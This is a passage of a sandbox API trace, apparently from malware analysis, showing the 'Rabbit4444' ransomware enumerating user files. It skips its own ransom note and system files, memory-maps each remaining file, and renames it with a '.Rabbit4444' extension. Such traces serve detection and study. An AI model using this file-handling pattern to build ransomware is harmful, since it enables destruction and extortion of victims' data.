"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2.rabbit4444"), dwFlags=0x1) returned 1 [0071.303] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b85024, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf2b85024, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xf4b6891c, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x1495c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", cAlternateFileName="19E5A6~1")) returned 1 [0071.303] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.303] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.303] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="Rabbit4444.exe") returned -1 [0071.303] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2=".") returned 1 [0071.303] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="..") returned 1 [0071.304] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="windows") returned -1 [0071.304] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="bootmgr") returned -1 [0071.304] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="pagefile.sys") returned -1 [0071.304] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="boot") returned -1 [0071.304] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="ids.txt") returned -1 [0071.304] lstrcmpiW (lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", lpString2="NTUSER.DAT") returned -1 [0071.304] lstrcpyW (in: lpString1=0x130ec18, lpString2="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583" | out: lpString1="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583") returned="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583" [0071.304] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583", dwFileAttributes=0x0) returned 1 [0071.305] lstrlenW (lpString="19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583") returned 64 [0071.305] lstrlenW (lpString="Rabbit4444") returned 10 [0071.305] lstrcmpiW (lpString1="bd4d62b583", lpString2="Rabbit4444") returned -1 [0071.305] lstrlenW (lpString=".dll") returned 4 [0071.305] lstrcmpiW (lpString1="b583", lpString2=".dll") returned 1 [0071.305] lstrlenW (lpString=".lnk") returned 4 [0071.305] lstrcmpiW (lpString1="b583", lpString2=".lnk") returned 1 [0071.305] lstrlenW (lpString=".ini") returned 4 [0071.305] lstrcmpiW (lpString1="b583", lpString2=".ini") returned 1 [0071.305] lstrlenW (lpString=".sys") returned 4 [0071.305] lstrcmpiW (lpString1="b583", lpString2=".sys") returned 1 [0071.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.305] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.305] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16261612033) returned 1 [0071.305] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1349056) returned 1 [0071.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0071.306] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0071.306] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1498c0, lpName=0x0) returned 0x27c [0071.306] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1498c0) returned 0x2f10000 [0071.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x111008 [0071.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x111008 | out: hHeap=0xe0000) returned 1 [0071.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0071.341] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16265218924) returned 1 [0071.342] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0071.342] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0071.342] UnmapViewOfFile (lpBaseAddress=0x2f10000) returned 1 [0071.353] CloseHandle (hObject=0x27c) returned 1 [0071.353] CloseHandle (hObject=0x260) returned 1 [0071.354] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583.Rabbit4444") returned 187 [0071.354] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\19e5a6240f137c4a1cf071859a4aeb3d9d0ebf907c21142ef769cfbd4d62b583.rabbit4444"), dwFlags=0x1) returned 1 [0071.355] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4479490, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb4479490, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb46b55a2, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x33e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", cAlternateFileName="25365A~1")) returned 1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="Rabbit4444.exe") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2=".") returned 1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="..") returned 1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="windows") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="bootmgr") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="pagefile.sys") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="boot") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="ids.txt") returned -1 [0071.355] lstrcmpiW (lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", lpString2="NTUSER.DAT") returned -1 [0071.355] lstrcpyW (in: lpString1=0x130ec18, lpString2="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c" | out: lpString1="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c") returned="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c" [0071.355] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c", dwFileAttributes=0x0) returned 1 [0071.356] lstrlenW (lpString="25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c") returned 64 [0071.356] lstrlenW (lpString="Rabbit4444") returned 10 [0071.356] lstrcmpiW (lpString1="b27ca0106c", lpString2="Rabbit4444") returned -1 [0071.356] lstrlenW (lpString=".dll") returned 4 [0071.356] lstrcmpiW (lpString1="106c", lpString2=".dll") returned 1 [0071.356] lstrlenW (lpString=".lnk") returned 4 [0071.356] lstrcmpiW (lpString1="106c", lpString2=".lnk") returned 1 [0071.356] lstrlenW (lpString=".ini") returned 4 [0071.356] lstrcmpiW (lpString1="106c", lpString2=".ini") returned 1 [0071.356] lstrlenW (lpString=".sys") returned 4 [0071.356] lstrcmpiW (lpString1="106c", lpString2=".sys") returned 1 [0071.356] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.357] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.357] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16266748782) returned 1 [0071.357] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=830) returned 1 [0071.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0071.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0071.357] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x27c [0071.358] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0071.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110ae0 [0071.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.360] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110ae0 | out: hHeap=0xe0000) returned 1 [0071.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.361] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16267146469) returned 1 [0071.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0071.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0071.361] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.361] CloseHandle (hObject=0x27c) returned 1 [0071.361] CloseHandle (hObject=0x260) returned 1 [0071.361] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c.Rabbit4444") returned 187 [0071.361] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\25365a8f39fbf4fd6d9a7acd7aa1443f509bde6738fa8267a4498bb27ca0106c.rabbit4444"), dwFlags=0x1) returned 1 [0071.362] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dd02b0, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x81dd02b0, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x8283e777, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", cAlternateFileName="25F9FB~1")) returned 1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="Rabbit4444.exe") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2=".") returned 1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="..") returned 1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="windows") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="bootmgr") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="pagefile.sys") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="boot") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="ids.txt") returned -1 [0071.362] lstrcmpiW (lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", lpString2="NTUSER.DAT") returned -1 [0071.362] lstrcpyW (in: lpString1=0x130ec18, lpString2="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04" | out: lpString1="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04") returned="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04" [0071.362] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04", dwFileAttributes=0x0) returned 1 [0071.363] lstrlenW (lpString="25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04") returned 64 [0071.363] lstrlenW (lpString="Rabbit4444") returned 10 [0071.363] lstrcmpiW (lpString1="900def1b04", lpString2="Rabbit4444") returned -1 [0071.363] lstrlenW (lpString=".dll") returned 4 [0071.363] lstrcmpiW (lpString1="1b04", lpString2=".dll") returned 1 [0071.363] lstrlenW (lpString=".lnk") returned 4 [0071.363] lstrcmpiW (lpString1="1b04", lpString2=".lnk") returned 1 [0071.363] lstrlenW (lpString=".ini") returned 4 [0071.363] lstrcmpiW (lpString1="1b04", lpString2=".ini") returned 1 [0071.364] lstrlenW (lpString=".sys") returned 4 [0071.364] lstrcmpiW (lpString1="1b04", lpString2=".sys") returned 1 [0071.364] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.364] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.364] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16267476651) returned 1 [0071.364] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2042) returned 1 [0071.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0071.364] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0071.364] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb00, lpName=0x0) returned 0x27c [0071.365] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb00) returned 0x70000 [0071.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110df8 [0071.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0071.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110df8 | out: hHeap=0xe0000) returned 1 [0071.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0071.368] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16267849591) returned 1 [0071.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0071.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0071.368] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.368] CloseHandle (hObject=0x27c) returned 1 [0071.368] CloseHandle (hObject=0x260) returned 1 [0071.368] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04.Rabbit4444") returned 187 [0071.368] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\25f9fbe9c828adb5370a558c9a3d624977aa91202481906f7785b7900def1b04.rabbit4444"), dwFlags=0x1) returned 1 [0071.369] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2863e61, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf2863e61, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xf36d82c1, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x5e2ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", cAlternateFileName="2A0D12~1")) returned 1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="Rabbit4444.exe") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2=".") returned 1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="..") returned 1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="windows") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="bootmgr") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="pagefile.sys") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="boot") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="ids.txt") returned -1 [0071.369] lstrcmpiW (lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", lpString2="NTUSER.DAT") returned -1 [0071.369] lstrcpyW (in: lpString1=0x130ec18, lpString2="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147" | out: lpString1="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147") returned="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147" [0071.369] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147", dwFileAttributes=0x0) returned 1 [0071.370] lstrlenW (lpString="2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147") returned 64 [0071.370] lstrlenW (lpString="Rabbit4444") returned 10 [0071.370] lstrcmpiW (lpString1="af15f2f147", lpString2="Rabbit4444") returned -1 